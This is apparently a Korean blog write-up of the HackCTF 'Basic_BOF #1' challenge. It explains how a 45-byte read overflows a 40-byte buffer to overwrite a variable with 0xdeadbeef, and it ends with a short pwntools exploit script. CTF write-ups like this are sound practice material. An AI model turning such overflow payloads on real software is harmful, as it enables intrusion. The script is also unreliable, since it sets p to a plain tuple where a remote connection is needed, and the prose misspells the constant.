HackCTF Basic_BOF #1 Write Up

War Game

2020. 3. 7. 18:40

반응형

우선 파일을 받고 exeinfo를 통해 정보를 확인해주었다.

32바이트로 확인된다.

IDA를 통해 main코드를 보자.

코드를 보면 v5를  0xDEATBEEF으로 덮어주면 된다.

bof문제이니 우리가 입력한 값을 저장해주는 변수와 덮어주어야할 변수인 v5의 거리를 구해보자

40바이트의 공간이 있다.

코드를 보면 45바이트만큼 입력받기 때문에 v5를 덮어줄 수 있을 것 같다.

pwntools로 풀어주자

from pwn import *
p = ("ctf.j0n9hyn.xyz", 3000)
payload = "a"*40 + "\xef\xbe\xad\xde"
p.sendline(payload)
p.interactive()

반응형